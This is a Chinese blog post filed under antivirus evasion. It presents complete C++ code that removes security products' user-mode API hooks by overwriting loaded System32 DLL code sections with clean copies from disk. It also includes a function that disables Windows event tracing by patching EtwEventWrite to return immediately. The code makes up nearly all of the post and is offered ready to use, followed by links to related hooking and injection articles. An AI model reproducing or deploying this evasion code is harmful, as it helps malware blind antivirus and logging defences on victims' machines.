R3 HOOK 卸载

已于 2024-01-10 18:03:03 修改
阅读量559 收藏 6
点赞数 9
分类专栏: 免杀 二进制 渗透 文章标签: c++ 网络 网络安全 操作系统 安全 web安全
于 2023-12-25 16:16:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_18811919/article/details/135202448
版权
卸载R3 WINAPI HOOK 代码
说明
很多常见的杀软会挂钩R3 WINAPI来实现行为拦截等操作下列代码是遍历当前进程所有模块,
如果是位于System32下的模块则进行PE解析text代码段对可能Hook的模块进行reload操作,
实现卸载杀软R3 HOOK操作。

#include <windows.h>
#include <psapi.h>
#include <iostream>
#include <string>
#include <algorithm>
using namespace std;
//bypass ETW功能如果有需要绕过Windows事件跟踪可以调用该函数,EtwEventWrite 改为ret空返回
void bypassetw()
{
    unsigned char pEtwEventWriteName[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0 };

    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    LPVOID pEtwEventWrite = nullptr;
    pEtwEventWrite = GetProcAddress(hNtdll, (LPCSTR)pEtwEventWriteName);
    if (pEtwEventWrite != nullptr) {
        DWORD oldProtect;
        BYTE path[8] = {0x90,0x90,0x90,0x90,0x90,0xC3,0XC3,0XC3};
        VirtualProtect((LPVOID)pEtwEventWrite, 10, PAGE_EXECUTE_READWRITE, &oldProtect);
        memcpy((LPVOID)pEtwEventWrite, path, 8);
        VirtualProtect((LPVOID)pEtwEventWrite, 10, PAGE_EXECUTE_READ, &oldProtect);
    }
    FreeLibrary(hNtdll);
    return;

}
DWORD UNHOOK(char* dllName) {
    string dllStringName = "c:\\windows\\system32\\";
    dllStringName.append(dllName);
    MODULEINFO mi = {};
    HMODULE ntdllModule = GetModuleHandleA(dllName);
    GetModuleInformation(HANDLE(-1), ntdllModule, &mi, sizeof(mi));
    LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
    HANDLE ntdllFile = CreateFileA(dllStringName.c_str(), GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
    LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);

    PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
    PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);

    for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
        PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

        if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
            DWORD oldProtection = 0;
            bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
            memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
            isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
        }
    }
    UnmapViewOfFile(ntdllMappingAddress);
    CloseHandle(ntdllFile);
    CloseHandle(ntdllMapping);
    return 0;
}




void ListModules(DWORD processID) {
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID);
    if (hProcess == NULL) {
        std::cerr << "Failed to open process. Error code: " << GetLastError() << std::endl;
        return;
    }

    HMODULE hModuleArray[1024];
    DWORD cbNeeded;
    if (EnumProcessModules(hProcess, hModuleArray, sizeof(hModuleArray), &cbNeeded)) {
        int moduleCount = cbNeeded / sizeof(HMODULE);

        std::cout << "Modules in process " << processID << ":" << std::endl;

        for (int i = 0; i < moduleCount; ++i) {
            TCHAR szModName[MAX_PATH];
            if (GetModuleBaseName(hProcess, hModuleArray[i], szModName, sizeof(szModName) / sizeof(TCHAR))) {
                // 获取模块绝对路径
                TCHAR szModPath[MAX_PATH];
                if (GetModuleFileNameEx(hProcess, hModuleArray[i], szModPath, sizeof(szModPath) / sizeof(TCHAR))) {
                    uintptr_t moduleBaseAddress = reinterpret_cast<uintptr_t>(hModuleArray[i]);
                    std::wcout << L"  " << szModName << L" (Address: 0x" << std::hex << moduleBaseAddress
                        << L", Path: " << szModPath << L")" << std::endl;

                    
               
                    std::wstring modPath = szModPath;
                    std::transform(modPath.begin(), modPath.end(), modPath.begin(), ::towlower);

                    std::wstring searchString = L"c:\\windows\\system32";
                    if (modPath.find(searchString) != std::wstring::npos) {

                        // 转换szModName为char类型
                        char szModNameChar[MAX_PATH];
                        if (WideCharToMultiByte(CP_UTF8, 0, szModName, -1, szModNameChar, MAX_PATH, NULL, NULL) > 0) {
                            UNHOOK(szModNameChar);
                            printf("-----------------------Unload hook Name Module:%s-----------------------\r\n", szModNameChar);
                        }
                        std::wcout << L"    This module is in c:\\windows\\system32." << std::endl;
                    }
                    else {
                        //std::wcout << L"    This module is not in c:\\windows\\system32." << std::endl;
                    }


                }
                else {
                    std::cerr << "GetModuleFileNameEx failed. Error code: " << GetLastError() << std::endl;
                }
            }
        }
    }
    else {
        std::cerr << "EnumProcessModules failed. Error code: " << GetLastError() << std::endl;
    }

    CloseHandle(hProcess);
}

int main() {
    DWORD processID = GetCurrentProcessId();
    ListModules(processID);
    return 0;
}
hook钩子 卸载时和卸载
马娟的博客
03-02 1586
卸载时的操作 //即将卸载时的操作 <Prompt message={(location) => { if (resetModal) { resetModal.destroy(); } }} /> 卸载完成后的操作 //卸载完成后的操作 useEffect(() => { return componentDidUnmount; }, []); const componentDidUnmount
API HOOK远程卸载方法
Qyuewei的专栏
07-19 1627
远程卸载的方法主要是在注入的基础上进行,
R3下 API 挂钩监视右键管理员权限启动
最新发布
溡漪幽博客
10-24 231
以前的操作系统上,挂钩 CreateProcessInternel 即可监视进程创建,在 以管理员身份启动的时候,情况发生了变化,我们的 explorer 不再调用原来的路径,而是使用一个未被导出的函数 AicFindLaunchAdminProcess。我们只需要根据特征码定位该函数的入口点,并挂钩该函数,即可监视资源管理器中,那些以管理员身份启动的程序
关于HOOK的一些安装卸载说明以及消息类型说明
小S资料屋
02-28 652
HOOK的概念 1:HOOK总的来说是windows处理消息的一个机制,通过它可以进行消息的截获,可以用在比较底层的一些开发 HOOK必须使用下面的语句: LRESULT CALLBACK HookProc ( int nCode, WPARAM wParam, LPARAM lParam ); HOOKProc是定义函数的名称 nC...
DLL注入与卸载(用于hook api)
Yvan Jiang的专栏
08-04 1398
DLL注入与卸载 代码参考网上,最后做个小工具可以加载dll并注入到目标进程 1、判断系统版本,winxp win7 win vista win10 DWORD checkOS() { OSVERSIONINFO os_version; os_version.dwOSVersionInfoSize = sizeof(os_version); if (GetVersionEx(&os_version)) { if (os_version.dwMajorVersion == 5) {
通过API Hook获取R3下进程创建信息的一种较新的方案
溡漪幽博客
05-29 711
APIHOOK R3 注入拦截进程,支持管理员身份提权的信息拦截。
钩子编程(HOOK) 留后门与钩子卸载 (2)
机器学习
05-14 5971
[钩子编程(HOOK) 留后门与钩子卸载]根据前面几篇文章对进程内钩子有了个初步了解,本文继续谈及钩子卸载问题。一般编写钩子程序,我们希望程序一方面能屏蔽键盘鼠标消息,但又希望程序能留有一个“后门”,例如,按下F2退出程序
应用层IAT hook
11-01
与Ring 0(内核模式)的hook相比,R3 IAT Hook无需特殊权限,更易于实现且对系统稳定性影响较小。 ### 三、IAT Hook原理 1. **定位目标函数**: 首先,我们需要找到目标模块的IAT,并确定待hook的函数在IAT中的位置...
android hook工具,Android Native Hook 工具实践
weixin_35436969的博客
05-26 1229
作者:GToad作者博客:GToad Blog本文章所对应项目长期维护与更新,因为在我自己的几台测试机上用得还挺顺手的。本项目作为作者本人的一个学习项目将会长期更新以修复当前可能存在的Bug以及跟进以后Android NDK可能出现的主流汇编模式。前言在目前的安卓APP测试中对于Native Hook的需求越来越大,越来越多的APP开始逐渐使用NDK来开发核心或者敏感代码逻辑。个人认为原因如下:安...
无痕注入dll_如何在R3尽量完美的隐藏一个DLL
weixin_39669761的博客
12-19 2387
哈哈哈专栏开通啦!咳咳..这个专栏主要写一些和安全开发的东西,需要一定的相关知识,并且不(定期)更新,恩,就这样主要是前几天群里师傅提出了这个问题,所以就去实现下,现将操作记录与此0x01 从加载开始要注入一个DLL的方法很多,但是我们希望一切在Exe知道之前就能完成(这样最不容易被发现对不),所以NTCreateThread和置换Dll就显得不好使了NTCreateThread创建线程的时间靠后...
R3 WIN64下只修改1字节的Inline Hook完整代码(C/C++
02-19
基于SEH的R3 WIN64下只修改1字节的Inline Hook完整代码 此代码在Visual Studio 2013编译通过,为了不链接到msvcr120.dll,我在工程中添加了链接至msvcrt.dll的静态库
R3进程DLL注入HOOK
zyorz的博客
05-04 1213
工具DLL中可使用三种HOOK引擎实现HOOK,分别为开源引擎nthookengine、mhook和微软的Detour流程本进程HOOK可直接导入引擎DLL调用API实现注入其他进程HOOK通过编写一个实现了HOOK本进程的DLL然后将其注入到目标进程实现 注入实现:http://blog.youkuaiyun.com/zyorz/article/details/71153713引擎APImhook引擎HOO
Windows内核驱动Hook入门
随心动,随风行
07-16 8910
文章目录Hook框架选择基于微软规范的框架微软规范以外的框架简单介绍一下InfinityHook获取内核中的函数地址内核中导出的函数内核未导出的函数获取 SSDT ShadowSSDT 地址获取系统服务号手动获取获取并判断系统版本代码自动获取获取GUI相关的函数地址,还需附加GUI进程获取进程 PEPROCESS获取函数地址替换被Hook的函数 的函数实现获取函数原型如果被Hook的函数是一个高频函数,如何准确定位到是自己的程序调用分析不同情况下的返回值类型,调用的 R3 API 如何进行处理这些返回值分
完美绕开CRC32检测的无痕hook
陈子青的博客
07-18 5684
Hook英文有钩子、曲线球的意思。简单来讲就是走弯路,比如原本程序是从A到B顺序来执行,此时我们在A点做Hook,将程序执行路线变成了从A点先到C点再到B点,这个过程就叫Hook,C点这里是我们让程序走的弯路,可以通过在C点做数据加工,就可以让程序的执行出我们想要的结果。(记住此时的ABC,下文都以此为例)............
Linux 内核学习笔记
AI.PLAY
01-10 1万+
Linux内核学习笔记 《linux内核设计艺术》写的很好,对于理解操作系统的工作原理有很大帮助,以下是我在读这本书时所整理的一些框架,希望可以对读者理解linux操作系统的内核起到一定的作用,由于本人水平有限,不足之处,欢迎广大读者留言指正。 1.linnux启动 计算机在启动时,内存中是没有程序的,所以需要将硬盘中的操作系统加载到内存中,在内存(RAM)中什么程
自写Api过r3的Api函数hook
被遗弃的庸才博客
08-13 1014
这里验证的环境是win7 64位和win10 64位 首先是64位程序,这里由于win7和win10的调用号不同,需要根据所使用的系统修改相应的调用号,顺带说明一下win64的vs程序是不支持内联汇编,这里是我自己下载的intel的parallel studio使得vs支持了内联汇编。 #include<windows.h> /*------------------------...
[VT虚拟化驱动]利用EPT实现无痕HOOK
热门推荐
吾无法无天的博客
12-06 1万+
本章利用讲EPT无痕HOOK
自写API绕过R3下所有HOOK
huobengle
11-09 955
拿FindWindow来做测试,先OD跟一下HWND hWnd=::FindWindow(_T("SciCalc"),_T("计算器")); ::SendMessage(hWnd,WM_CLOSE,NULL,NULL);为了方便分析参数,给FindWindow也传递了类名。 OD载入,bp FindWindowW,运行后断下来,来到FindWindowW里面77D2C9C5 55 ...
无痕HOOK方式=硬断+VEH
YuHengZuo的博客
11-24 1万+
无痕HOOK方式=硬断+VEH
利用Hook cpuid源码改造只限CPU的软件方法
因为对cpuid的Hook操作通常需要操作系统层面的权限,所以在Windows系统中这可能是一个内核驱动程序,用于加载和卸载cpuid的Hook模块。 9. r3loader:在Windows操作系统的分层结构中,Ring3指的是用户态,Ring0指的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值